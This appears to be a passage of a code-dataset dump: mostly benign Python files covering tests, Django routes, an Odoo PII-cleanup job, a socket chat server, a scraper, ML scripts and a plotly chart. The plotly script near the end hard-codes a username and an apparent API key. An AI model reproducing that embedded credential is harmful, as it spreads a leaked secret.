date.Date(1,1,1,1,1,2013)\n\t\ttempdate = date.Date(10,1,3,1,5,2014)\n\t\tchocoshot = item.Chocoladeshot(today,tempdate,1)\n\t\tself.assertEqual(chocoshot.getColor(),\"wit\")\n\t\tchocoshot.setColor(2)\n\t\tself.assertEqual(chocoshot.getColor(),\"bruin\")\n\t\tself.assertEqual(chocoshot.getPrice(),1)\n\ndef test_honing(self):\n\t\ttoday = date.Date(1,1,1,1,1,2013)\n\t\ttempdate = date.Date(10,1,3,1,5,2014)\n\t\thoning = item.Honing(today,tempdate)\n\t\tself.assertEqual(honing.getPrice(),0.50)\n\ndef test_Marshmallow(self):\n\t\ttoday = date.Date(1,1,1,1,1,2013)\n\t\ttempdate = date.Date(10,1,3,1,5,2014)\n\t\tmarshmallow = item.Marshmallow(today,tempdate)\n\t\tself.assertEqual(marshmallow.getPrice(),0.75)\n\ndef test_Chilipeper(self):\n\t\ttoday = date.Date(1,1,1,1,1,2013)\n\t\ttempdate = date.Date(10,1,3,1,5,2014)\n\t\tchilipeper = item.Chilipeper(today,tempdate)\n\t\tself.assertEqual(chilipeper.getPrice(),0.25)\n\n\ndef test(self):\n\tprint()\n\tprint(\"starting testing testItem\")\n\ttest_chocoladeshot(self)\n\ttest_honing(self)\n\ttest_Marshmallow(self)\n\ttest_Chilipeper(self)\n\tprint(\"finished testing testItem\")\n\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"Project/testItem.py","file_name":"testItem.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"361753016","text":"# _*_ coding:utf-8 _*_\n_author_ = 'jackson'\n_date_ = '2019/4/7 16:50'\n\n\nfrom django.conf.urls import url,include\nfrom .views import MoocsListView,MoocDetailView,AddFavView\n\nurlpatterns = [\n    # MOOC group list page\n    url(r'^list/$', MoocsListView.as_view(), name=\"mooc_list\"),\n\n    # MOOC group detail page\n    url(r'^detail/(?P\\d+)/$', MoocDetailView.as_view(), name=\"mooc_detail\"),\n    # url(r'^detail/$', MoocDetailView.as_view(), name=\"moocs_detail\"),\n\n    # Add a MOOC to favorites\n    url(r'^add_fav/$',AddFavView.as_view(),name=\"add_fav\")\n\n]","sub_path":"apps/moocs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"626692394","text":"import os\n\nimport cv2\nimport numpy as np\n\npath = os.getcwd() + os.sep\n# path += '../db_aulas/Imagens/obama.jpeg'\npath += '../db_images/jpeg/captcha.jpeg'\n# path += '../db_images/png/captcha.png'\n\nimg = cv2.imread(path)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\ndetector = cv2.FastFeatureDetector_create()\nkps = detector.detect(gray, None)\n\nimg2 = cv2.drawKeypoints(img, kps, None, color=(255,0,0))\n\ncv2.imshow(\"image\", np.hstack([img, img2]))\ncv2.waitKey(0)\n","sub_path":"aulas/vision/aula_11/fast_detecter_pontos.py","file_name":"fast_detecter_pontos.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"419078265","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. 
See LICENSE file for full copyright and licensing details.\n\nfrom odoo import api, models, fields\nfrom odoo.addons.iap.tools import iap_tools\nfrom ..endpoint import DEFAULT_ENDPOINT\n\n\nclass ResPartner(models.Model):\n \"\"\"\n Inherited for VAT configuration in partner of Warehouse.\n \"\"\"\n _inherit = \"res.partner\"\n\n is_amz_customer = fields.Boolean(\"Is Amazon Customer?\")\n\n @api.model\n def _search(self, args, offset=0, limit=None, order=None, count=False, access_rights_uid=None):\n if not self.env.context.get('is_amazon_partner', False):\n args = [('is_amz_customer', '=', False)] + list(args)\n return super(ResPartner, self)._search(args, offset, limit, order, count, access_rights_uid)\n\n @api.onchange(\"country_id\")\n def _onchange_country_id(self):\n \"\"\"\n Inherited for updating the VAT number of the partner as per the VAT configuration.\n @author: Maulik Barad on Date 13-Jan-2020.\n \"\"\"\n if self.country_id:\n warehouse_ids = self.env[\"stock.warehouse\"].search_read(\\\n [(\"partner_id\", \"=\", self._origin.id)],\n [\"id\", \"company_id\"])\n if warehouse_ids:\n vat_config = self.env[\"vat.config.ept\"].search(\\\n [(\"company_id\", \"=\", warehouse_ids[0].get(\"company_id\")[0])])\n vat_config_line = vat_config.vat_config_line_ids.filtered(\\\n lambda x: x.country_id == self.country_id)\n if vat_config_line:\n self.write({\"vat\": vat_config_line.vat})\n return super(ResPartner, self)._onchange_country_id()\n\n @api.model\n def create(self, vals):\n if vals.get('is_amz_customer'):\n vals.update({'allow_search_fiscal_based_on_origin_warehouse': True})\n return super(ResPartner, self).create(vals)\n\n def auto_delete_customer_pii_details(self):\n \"\"\"\n Auto Archive Customer's PII Details after 30 days of Import as per Amazon MWS Policies.\n :return:\n \"\"\"\n if not self.env['amazon.seller.ept'].search([]):\n return True\n account = self.env['iap.account'].search([('service_name', '=', 'amazon_ept')])\n dbuuid = self.env['ir.config_parameter'].sudo().get_param('database.uuid')\n kwargs = {\n 'app_name': 'amazon_ept',\n 'account_token': account.account_token,\n 'dbuuid': dbuuid,\n 'updated_records': 'Scheduler for delete PII data has been started.'\n }\n iap_tools.iap_jsonrpc(DEFAULT_ENDPOINT + '/delete_pii', params=kwargs, timeout=1000)\n query = \"\"\"update res_partner set name='Amazon',commercial_company_name='Amazon', \n display_name='Amazon', \n street=NULL,street2=NULL,email=NULL,city=NULL,state_id=NULL,country_id=NULL,\n zip=Null,phone=NULL,mobile=NULL\n from\n (select r1.id as partner_id,r2.id as partner_invoice_id,r3.id as \n partner_shipping_id from sale_order\n inner join res_partner r1 on r1.id=sale_order.partner_id\n inner join res_partner r2 on r2.id=sale_order.partner_invoice_id\n inner join res_partner r3 on r3.id=sale_order.partner_shipping_id\n where amz_instance_id is not null and sale_order.create_date<=current_date-30)T\n where res_partner.id in \n (T.partner_id,T.partner_invoice_id,T.partner_shipping_id)\n \"\"\"\n self.env.cr.execute(query)\n\n if self.env.cr.rowcount:\n kwargs.update({'updated_records': 'Archived %d customers' % self.env.cr.rowcount})\n iap_tools.iap_jsonrpc(DEFAULT_ENDPOINT + '/delete_pii', params=kwargs, timeout=1000)\n return True\n","sub_path":"amazon_ept/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"402098672","text":"import os\nimport collections\nimport 
json\n\n\ndef update(d, u):\n for k, v in u.items():\n if isinstance(v, collections.Mapping):\n d[k] = update(d.get(k, {}), v)\n else:\n d[k] = v\n return d\n\n\ndef update_from_path(d, u, path):\n if len(path) == 1:\n d[path[0]] = u[path[0]]\n return d\n d[path[0]] = update_from_path(d.get(path[0], {}), u[path[0]], path[1:])\n return d\n\n\ndef update_config_from_state(c, logger):\n if 'state' not in c or 'file' not in c['state']:\n raise ValueError('No state listed in config')\n if os.path.exists(c[\"state\"][\"file\"]):\n with open(c[\"state\"][\"file\"], \"r\") as f:\n state = json.load(f)\n c = update(c, state)\n else:\n logger.info(\"State storage file doesn't exist, initializing with empty state!\")\n return c\n\n\ndef update_state(config, logger):\n if 'state' not in config or 'file' not in config['state']:\n raise ValueError('No state listed in config')\n if len(config[\"state\"][\"file\"]) < 1:\n logger.info(\"State storage disabled in config (state file empty)! Skipping update..\")\n return\n state = {}\n for field_path in config[\"state\"][\"fields\"]:\n field_path_list = field_path.split(\":\")\n update_from_path(state, config, field_path_list)\n try:\n with open(config[\"state\"][\"file\"], \"w\") as f:\n json.dump(state, f, indent=2)\n except Exception as e:\n logger.warning(\"Failed to save state file, because: {}\".format(str(e)))\n","sub_path":"utils/src/python/ConfigUtils.py","file_name":"ConfigUtils.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"273374653","text":"#! /usr/bin/python2\n\nfrom jinja2 import Template, Environment, FileSystemLoader\nfrom os import listdir\n\nmanglers = {\n '.hs': \"Hs\",\n '.py': \"Py\",\n '.ou': \"Out\",\n}\n\ndef mangle(xs):\n def _mangle(xs, ms):\n if not ms:\n return xs\n m = ms.pop()\n return _mangle(xs.replace(*m), ms)\n return _mangle(xs, manglers.items())\n\nbpath = \"./examples/\"\nxs = listdir(bpath)\nxs = [x for x in xs if x[-3:] in manglers.keys()]\nxs = [(mangle(x), open(bpath + x).read().strip()) for x in xs]\n\nopen(\"./index.html\", \"w\").write(\n Environment(loader = FileSystemLoader('./')).\\\n get_template(\"./index.html.jinja\").\\\n render(**dict(xs)).\\\n encode(\"utf-8\")\n)\n","sub_path":"make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"117180179","text":"\"\"\"Variable selection using ridge regression\"\"\"\nimport pickle\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import mean_absolute_error\n\nfrom bld.project_paths import project_paths_join as ppj\nfrom src.model_code.polynomialregression import PolynomialRegression\nfrom src.model_code.ridgeregression import RidgeRegression\nfrom src.utilities.utilities import load_testing_data\nfrom src.utilities.utilities import load_training_data\n\n\ndef is_interaction(coef_name):\n return \":\" in coef_name\n\n\ndef is_squared(coef_name):\n return coef_name.endswith(\"^2\")\n\n\nif __name__ == \"__main__\":\n # data used for ridge regression (low sample size to induce regularization)\n Xridge, yridge = load_training_data(nobs=200)\n # data used for polynomial model fitting on subset of variables\n Xpol, ypol = load_training_data(nobs=5000)\n # data used to estimate the mean absolute error on test set\n Xtest, ytest = load_testing_data(nobs=5000)\n\n rr = RidgeRegression()\n pr = PolynomialRegression()\n\n # ridge regression, 
variable regularization\n rr = rr.fit(Xridge, yridge, degree=1)\n\n coef = rr.coefficients.values.reshape(-1)\n\n thresholds = np.linspace(0, 0.05, num=500)\n\n # find parameters which are zero given a threshold\n is_zero = []\n for thresh in thresholds:\n zero = np.where(np.abs(coef) < thresh)[0]\n is_zero.append(zero)\n\n # extract parameter names\n is_zero_named = [rr.coefficients.index[index].to_list() for index in is_zero]\n\n is_zero_squared = [[e for e in x if is_squared(e)] for x in is_zero_named]\n is_zero_interaction = [[e for e in x if is_interaction(e)] for x in is_zero_named]\n is_zero_linear = [\n [e for e in x if not is_interaction(e) and not is_squared(e)]\n for x in is_zero_named\n ]\n\n # compute test mae using polynomial model and store in data frame\n mae = []\n for drop in is_zero_named:\n XX = Xpol.drop(drop, axis=1)\n XXtest = Xtest.drop(drop, axis=1)\n pr = pr.fit(XX, ypol, degree=2, fit_intercept=True)\n ypred = pr.predict(XXtest)\n mae.append(mean_absolute_error(ytest, ypred))\n\n df = pd.DataFrame(zip(mae, thresholds), columns=[\"mae\", \"thresholds\"])\n\n # compute when the set of variables that are set to zero changes\n changes = []\n change_index = []\n for i in range(len(is_zero_linear) - 1):\n e = set(is_zero_linear[i])\n ee = set(is_zero_linear[i + 1])\n if e != ee:\n change_index.append(i + 1)\n changes.append(list(ee - e)[0])\n\n # save data\n data = {\n \"df\": df,\n \"change_index\": change_index,\n \"changes\": changes,\n \"thresholds\": thresholds,\n }\n with open(ppj(\"OUT_ANALYSIS\", \"variable_selection.pkl\"), \"wb\") as handle:\n pickle.dump(data, handle, protocol=pickle.HIGHEST_PROTOCOL)\n","sub_path":"src/analysis/variable_selection.py","file_name":"variable_selection.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"230195922","text":"import numpy as np\nimport random\nimport os\n\ncls=\"\\n\"*100\nprint(\"------------- Soma de Matrizes -------------\")\nwhile True:\n\tprint(\"Matriz A\")\n\tmA = int(input(\"Numero de linhas: \"))\n\tnA = int(input(\"Numero de colunas: \"))\n\tx=mA*nA\n\tmatA = np.arange(x).reshape(mA,nA)\n\n\tprint()\n\t\n\tprint(\"Matriz B\")\n\tmB = int(input(\"Numero de linhas: \"))\n\tnB = int(input(\"Numero de colunas: \"))\n\tx=mB*nB\n\tmatB = np.arange(x).reshape(mB,nB)\n\n\tif (mA!=mB) or (nA!=nB):\n\t\tos.system('cls' if os.name == 'nt' else 'clear')\n\t\tprint(\"Impossivel realizar a soma, numero de linhas ou de colunas diferentes entre as matrizes A e B\")\n\telse:\n\t\tbreak\n\nmatC = np.arange(x).reshape(mB,nB)\n\nfor i in range(mA):\n\tfor j in range(nA):\n\t\tmatA[i][j] = random.randint(0,9)\n\nfor i in range(mA):\n\tfor j in range(nA):\n\t\tmatB[i][j] = random.randint(0,9)\n\nfor i in range(mA):\n\tfor j in range(nA):\n\t\tmatC[i][j] = matA[i][j] + matB[i][j]\nprint()\n\nespaco = ' '*nA\n\nprint(\"Matriz A\",espaco, end='\t\t')\nprint(\"Matriz B\",espaco, end='\t\t')\nprint(\"Matriz C\")\n\nfor i in range(mA):\n\tfor j in range(nA):\n\t\tprint(matA[i][j], end=\" \")\n\tprint(\"\t\t\t\", end='')\n\tfor j in range(nA):\n\t\tprint(matB[i][j], end=\" \")\n\tprint(\"\t\t\t\", end='')\n\tfor j in range(nA):\n\t\tprint(matC[i][j], end=\" \")\n\tprint()\n","sub_path":"1e.py","file_name":"1e.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"52571614","text":"# protest.py\n# by aaron montoya-moraga\n# march 2017\n\n# to 
distribute, on terminal do\n# python setup.py sdist\n\n# from distutils.core import setup\n\nfrom setuptools import *\nfrom codecs import open\nfrom os import path\n\n\n# taken from https://tom-christie.github.io/articles/pypi/\nhere = path.abspath(path.dirname(__file__))\n\n# taken from https://tom-christie.github.io/articles/pypi/\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\n\nsetup(\n name='protest',\n version='0.5.11',\n url='https://github.com/montoyamoraga/protestpy',\n author='aaron montoya-moraga',\n description='automatic generation of protesting material',\n long_description=long_description,\n license='MIT',\n packages= find_packages(exclude=['contrib', 'docs', 'tests*']),\n install_requires=['Pillow', 'videogrep', 'selenium<3.0.0', 'youtube_dl', 'chromedriver'],\n package_data={'protest': ['*.ttf']}\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"579312729","text":"import Globals\r\nimport wx\r\nimport PlatformMethods\r\n\r\nclass DirectoryTreeView:\r\n def __init__(self, parentWin, treeDirList):\r\n self.parentWindow = parentWin\r\n self.treeDirList = treeDirList\r\n # Create an image list\r\n dirIL = wx.ImageList(16,16, True)\r\n \r\n # Get some standard images from the art provider and add them\r\n # to the image list\r\n self.fldridx = dirIL.Add(\r\n wx.ArtProvider.GetBitmap(wx.ART_FOLDER, \r\n wx.ART_OTHER, (16,16)))\r\n \r\n self.fldropenidx = dirIL.Add(\r\n wx.ArtProvider.GetBitmap(wx.ART_FILE_OPEN, \r\n wx.ART_OTHER, (16,16)))\r\n #Give the tree the image list\r\n self.treeDirList.AssignImageList(dirIL)\r\n #self.SetTreeButtons()\r\n self.UpdateDirectoryList()\r\n \r\n \r\n def UpdateDirectoryList(self):\r\n if len(Globals.DirectoryList) == 0:\r\n dirSet = set()\r\n for file in Globals.FileInfoList:\r\n dirSet.add(file.DirectoryPath)\r\n Globals.DirectoryList = list(dirSet)\r\n \r\n \r\n def SetTreeButtons(self):\r\n\r\n bitmap_plus = PlatformMethods.ConvertFilePath(\"Images/Bitmaps/plus4.ico\")\r\n bitmap_minus = PlatformMethods.ConvertFilePath(\"Images/Bitmaps/minus4.ico\")\r\n \r\n bitmap = wx.Bitmap(bitmap_plus, wx.BITMAP_TYPE_ICO)\r\n width = bitmap.GetWidth()\r\n \r\n il = wx.ImageList(width, width)\r\n \r\n il.Add(wx.Bitmap(bitmap_plus, wx.BITMAP_TYPE_ICO))\r\n #il.Add(wx.Bitmap(bitmap_plus, wx.BITMAP_TYPE_ICO))\r\n il.Add(wx.Bitmap(bitmap_minus, wx.BITMAP_TYPE_ICO))\r\n #il.Add(wx.Bitmap(bitmap_minus, wx.BITMAP_TYPE_ICO))\r\n\r\n self.buttonsIL = il \r\n #self.treeDirList.SetButtonsImageList(il)\r\n self.treeDirList.AssignButtonsImageList(il)\r\n \r\n def GetParentItem(self, parentName):\r\n parentItem = self.treeDirList.GetFirstChild(self.root)[0]\r\n while parentItem:\r\n if self.GetItemText(parentItem) == parentName:\r\n return parentItem\r\n parentItem = self.treeDirList.GetNextSibling(parentItem)\r\n return parentItem\r\n \r\n \r\n def AddDirectoryTreeNode(self, dirPath):\r\n dirList = dirPath.split(PlatformMethods.GetDirSeparator())\r\n #print dirList\r\n parentItem = self.root\r\n childrenDirList = dirList[1:]\r\n for dirName in dirList:\r\n if not dirName:\r\n continue\r\n #always start from directories in the drive e.g. 
C:\\NMT\\Research\\AJAX\r\n #dirName = dirList[i]\r\n siblingItem = self.GetSiblingItem(parentItem, dirName)\r\n #no directory with that name found in this level, so add it\r\n if not siblingItem:\r\n if parentItem == self.root:\r\n #add drive and image\r\n siblingItem = self.treeDirList.AppendItem(parentItem, dirName)\r\n self.treeDirList.SetItemImage(siblingItem, self.fldridx, wx.TreeItemIcon_Normal)\r\n self.treeDirList.SetItemImage(siblingItem, self.fldropenidx,\r\n wx.TreeItemIcon_Expanded)\r\n else:\r\n siblingItem = self.treeDirList.AppendItem(parentItem, dirName)\r\n self.treeDirList.SetItemImage(siblingItem, self.fldridx, wx.TreeItemIcon_Normal)\r\n self.treeDirList.SetItemImage(siblingItem, self.fldropenidx,\r\n wx.TreeItemIcon_Expanded)\r\n self.AddSubDirectories(siblingItem, childrenDirList)\r\n break\r\n else:\r\n childrenDirList = childrenDirList[1:]\r\n parentItem = siblingItem\r\n \r\n self.treeDirList.SortChildren(parentItem)\r\n \r\n \r\n #dir List without drive\r\n def AddSubDirectories(self, parentItem, childrenDirList):\r\n for dirName in childrenDirList:\r\n #Insert new node as parent Item\r\n parentItem = self.treeDirList.AppendItem(parentItem, dirName)\r\n self.treeDirList.SetItemImage(parentItem, self.fldridx, wx.TreeItemIcon_Normal)\r\n self.treeDirList.SetItemImage(parentItem, self.fldropenidx,\r\n wx.TreeItemIcon_Expanded)\r\n \r\n \r\n def GetSiblingItem(self, parentItem, dirName):\r\n siblingItem = self.treeDirList.GetFirstChild(parentItem)[0]\r\n while siblingItem:\r\n if self.GetTreeItemText(siblingItem) == dirName:\r\n break\r\n siblingItem = self.treeDirList.GetNextSibling(siblingItem)\r\n return siblingItem\r\n\r\n\r\n def GetDriveItem(self, driveName):\r\n rootDirItem = self.treeDirList.GetFirstChild(self.root)[0]\r\n while rootDirItem:\r\n if self.GetItemText(rootDirItem) == driveName:\r\n break\r\n parentItem = self.treeDirList.GetNextSibling(rootDirItem)\r\n return rootDirItem\r\n \r\n \r\n def AddDirectoryTreeNodes(self):\r\n self.treeDirList.DeleteAllItems()\r\n #tbd: add image for the root\r\n self.root = self.treeDirList.AddRoot(\"Folders (\" + str(Globals.CurrentProject.TotalDirectories) + \")\")\r\n fullDirPath = Globals.DirectoryList[0]\r\n fullPathList = fullDirPath.split(PlatformMethods.GetDirSeparator())\r\n \r\n for dirPath in Globals.DirectoryList:\r\n self.AddDirectoryTreeNode(dirPath)\r\n \r\n self.treeDirList.SortChildren(self.root)\r\n self.treeDirList.Expand(self.root)\r\n return self.root\r\n \r\n \r\n def GetTreeItemText(self, item):\r\n if item:\r\n return self.treeDirList.GetItemText(item)\r\n else:\r\n return \"\"","sub_path":"DirectoryViewStyle.py","file_name":"DirectoryViewStyle.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"116681642","text":"#coding=utf-8\nfrom oscar.apps.catalogue.admin import * # noqa\nfrom .models import SearchFilter,ProductAttribute,ProductGroup\n\nadmin.site.unregister(ProductAttribute,)\n\nclass SearchFilterUserMoneyChangeAdmin(admin.ModelAdmin):\n list_display = ('class_id','attribute', 'search_value', 'search_order', 'chose')\n \n \n def class_id(self,obj):\n return obj.attribute.product_class.name\n class_id.short_description= u'商品类'\n \n #过滤搜索属性\n def formfield_for_foreignkey(self, db_field, request=None, **kwargs):\n if db_field.name == 'attribute':\n kwargs['queryset'] = ProductAttribute.objects.filter(search_filter=True)\n\n return 
super(SearchFilterUserMoneyChangeAdmin,self).formfield_for_foreignkey(db_field, request=request, **kwargs)\n\nclass SearchFilterInline(admin.TabularInline):\n model = SearchFilter\n \nclass ProductAttributeAdmin(ProductAttributeAdmin):\n list_display = ('name', 'code', 'product_class', 'type')\n prepopulated_fields = {\"code\": (\"name\", )}\n inlines=[SearchFilterInline,]\n \nclass ProductGroupAdmin(admin.ModelAdmin):\n list_display = ('name',)\n filter_horizontal = ('attr',)\n \n\nadmin.site.register(SearchFilter,SearchFilterUserMoneyChangeAdmin)\nadmin.site.register(ProductAttribute, ProductAttributeAdmin)\nadmin.site.register(ProductGroup, ProductGroupAdmin)\n","sub_path":"stars/apps/catalogue/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"331016124","text":"\"\"\"Utilities for using the OpenCL kernels.\"\"\"\nimport numpy as np\nimport pyopencl as cl\n\n\nDOUBLE_FP_SUPPORT = (\n cl.device_fp_config.DENORM | cl.device_fp_config.FMA |\n cl.device_fp_config.INF_NAN | cl.device_fp_config.ROUND_TO_INF |\n cl.device_fp_config.ROUND_TO_NEAREST |\n cl.device_fp_config.ROUND_TO_ZERO\n )\n\n\ndef double_fp_support(device):\n \"\"\"\n Test whether a context supports double floating-point precission.\n\n :arg device: The OpenCL context to test.\n :type device: :class:`pyopencl._cl.Device`\n\n :returns: `True` if the device supports double floating-point precision,\n `False` otherwise.\n :rtype: `bool`\n \"\"\"\n return device.get_info(cl.device_info.DOUBLE_FP_CONFIG) & DOUBLE_FP_SUPPORT\n\n\ndef get_context():\n \"\"\"\n Find an appropriate OpenCL context.\n\n This function looks for a device with support for double\n floating-point precision and prefers GPU devices.\n\n :returns: A context with a single suitable device, or `None` is no suitable\n device is found.\n :rtype: :class:`pyopencl._cl.Context` or `NoneType`\n \"\"\"\n for platform in cl.get_platforms():\n for device_type in [cl.device_type.GPU, cl.device_type.ALL]:\n for device in platform.get_devices(device_type):\n if double_fp_support(device):\n return cl.Context([device])\n return None\n\n\ndef pad(array, group_size, axis=0):\n \"\"\"\n Pad an array with zeros so that it is a multiple of the group size.\n\n :arg array: Array to pad.\n :type array: :class:`numpy.ndarray`\n :arg int group_size: OpenCL group size.\n :arg int axis: The axis to pad with zeros. 
Default is 0.\n\n :returns: `array` padded with an appropriate number of zeros.\n :rtype: :class:`numpy.ndarray`\n \"\"\"\n array_size = array.shape[axis]\n remainder = array_size % group_size\n if remainder == 0:\n return array\n else:\n padding = group_size - array_size % group_size\n padding_shape = list(array.shape)\n padding_shape[axis] = padding\n return np.concatenate(\n (array, np.zeros(padding_shape, dtype=array.dtype)), axis=axis\n )\n","sub_path":"peridynamics/cl/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"506784711","text":"# server.py\n \nimport sys\nimport socket\nimport select\nimport re\nfrom utils import *\n\nclass Server:\n \n socket_list = []\n channels = []\n client_channel_map = {}\n host = \"localhost\"\n \n def __init__(self, port):\n self.host = socket.gethostbyname(self.host)\n self.port = int(port)\n \n # initialize the server socket with given host and port\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.server_socket.bind((self.host, self.port))\n \n # make it listen to 5 connections\n self.server_socket.listen(5)\n \n # add server socket to the list of readable connections\n self.socket_list.append(self.server_socket)\n \n def start_chat(self):\n while True:\n # get the list of sockets ready to be read through select.select\n ready_to_read, ready_to_write, in_error = select.select(self.socket_list, [], [])\n \n for socket in ready_to_read:\n if socket == self.server_socket:\n self.connection_request()\n \n # message is from an existing client connection\n else:\n try:\n message = socket.recv(MESSAGE_LENGTH)\n client_address = str(socket.getpeername())\n client_name = message.split(\" \", 1)[0].replace(\"[\", \"\").replace(\"]\", \"\")\n\n if message:\n # message is a control message\n if re.match(r'/', message.split(\" \", 1)[1].rstrip()):\n self.control_message(message, client_name, client_address, socket)\n \n # if not an ordinary message\n else:\n if self.client_channel_map.get(client_address):\n if \"Disconnect!\" in message.rstrip():\n self.broadcast(socket, SERVER_CLIENT_LEFT_CHANNEL.format(client_name) + \"\\n \")\n self.socket_list.remove(socket)\n self.client_channel_map.pop(socket)\n else:\n self.broadcast(socket, message + \" \")\n else:\n self.send_to_client(socket, SERVER_CLIENT_NOT_IN_CHANNEL + \"\\n \")\n except:\n continue\n \n \n # if a new connection request is received\n # socket == self.server_socket works because client socket is binded or has \n # the same host and ip such as this client\n def connection_request(self):\n (new_client_socket, (address)) = self.server_socket.accept()\n self.socket_list.append(new_client_socket)\n self.send_to_client(new_client_socket, \"Welcome to the chat app! 
Your address is \" + str(address) + \".\\n \")\n \n # handles control messages \n def control_message(self, message, name, address, socket):\n # send channel list to client\n if re.match(r'/list$', message.split(\" \", 1)[1].rstrip()):\n for channel in self.channels:\n self.send_to_client(socket, channel + \"\\n \")\n # client wants to create a new channel\n # elif \"/create\" in message:\n elif re.match(r'^(/create)', message.split(\" \", 1)[1].rstrip()):\n if re.match(r'/create\\s\\S+', message.split(\" \", 1)[1].rstrip()): \n channel = message.split(\"/create \")[1].rstrip()\n if channel in self.channels:\n self.send_to_client(socket, SERVER_CHANNEL_EXISTS.format(channel) + \".\\n \")\n else:\n if self.client_channel_map.get(address):\n self.broadcast(socket, SERVER_CLIENT_LEFT_CHANNEL.format(name) + \"\\n \")\n \n self.channels.append(channel)\n self.client_channel_map[address] = channel\n self.send_to_client(socket, \"You created a new channel named \" + channel + \".\\n \")\n else:\n self.send_to_client(socket, SERVER_CREATE_REQUIRES_ARGUMENT + \".\\n \")\n # join an existing channel \n # elif \"/join\" in message:\n elif re.match(r'^(/join)', message.split(\" \", 1)[1].rstrip()):\n if re.match(r'/join\\s\\S+', message.split(\" \", 1)[1].rstrip()): \n channel = message.split(\"/join \")[1].rstrip()\n if channel in self.channels:\n if self.client_channel_map.get(address):\n self.broadcast(socket, SERVER_CLIENT_LEFT_CHANNEL.format(name) + \".\\n \")\n \n self.client_channel_map[address] = channel\n self.send_to_client(socket, \"You joined a channel named \" + channel + \".\\n \")\n self.broadcast(socket, SERVER_CLIENT_JOINED_CHANNEL.format(name) + \".\\n \")\n else:\n self.send_to_client(socket, SERVER_NO_CHANNEL_EXISTS.format(channel) + \".\\n \")\n else:\n self.send_to_client(socket, SERVER_JOIN_REQUIRES_ARGUMENT + \".\\n \")\n else:\n self.send_to_client(socket, SERVER_INVALID_CONTROL_MESSAGE.format(message.split(\" \", 1)[1].rstrip()) + \"\\n \")\n \n # send message to all clients \n def broadcast(self, client_socket, message):\n for socket in self.socket_list:\n # send messages only to peers\n if socket != self.server_socket and socket != client_socket:\n if self.client_channel_map[str(client_socket.getpeername())] == self.client_channel_map[str(socket.getpeername())]:\n try:\n socket.send(message)\n except:\n socket.close()\n if socket in self.socket_list:\n self.socket_list.remove(socket)\n self.client_channel_map.pop(socket)\n \n # send to a specific client\n def send_to_client(self, client_socket, message):\n try:\n client_socket.send(message)\n except:\n client_socket.close()\n if client_socket in self.socket_list:\n self.socket_list.remove(client_socket)\n self.client_channel_map.pop(client_socket)\n\nif len(sys.argv) < 3:\n server = Server(sys.argv[1])\n server.start_chat()","sub_path":"Machine Problem #1 Chat (Kuizon, Vicente)/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"499966737","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\nclass MinecraftWikiCrawler:\n\n def __init__(self):\n self.Prefix = 'https://minecraft-zh.gamepedia.com/'\n\n def Search(self, Tag):\n format_string = ''\n url = self.Prefix + Tag\n res = requests.get(url)\n content = res.content\n soup = BeautifulSoup(content, 'html.parser')\n Total = ''\n for index, data in enumerate(soup.select('#pageWrapper #bodyContent div.mw-parser-output p')):\n format_string += 
str(data.text)\n if data.has_attr('href'):\n format_string += str(data['href'])\n Total += format_string\n return Total\n","sub_path":"Models/MinecraftWikiCrawler.py","file_name":"MinecraftWikiCrawler.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"9057445","text":"#Name: Chris Demundo\n#Umich ID: cdemundo\n\n# Imports -- you may add others but do not need to\nimport plotly.plotly as py\nimport plotly.graph_objs as go\nimport csv\n\n#login to plot.ly required to save offline image files\npy.sign_in('cdemundo', 'UEVvPcPrIgVPn6YTRLBF')\n\n# Code here should involve creation of the bar chart as specified in instructions\n# And opening / using the CSV file you created earlier with noun data from tweets\ncsv_file_path = \"./noun_data.csv\"\n\nwith open(csv_file_path) as f:\n reader = csv.DictReader(f)\n data = [r for r in reader]\n\ndata = [go.Bar(\n x=[d[\"Noun\"] for d in data],\n y=[d[\"Number\"] for d in data]\n )]\n\nlayout = go.Layout(\n title='Analysis of Tweets',\n 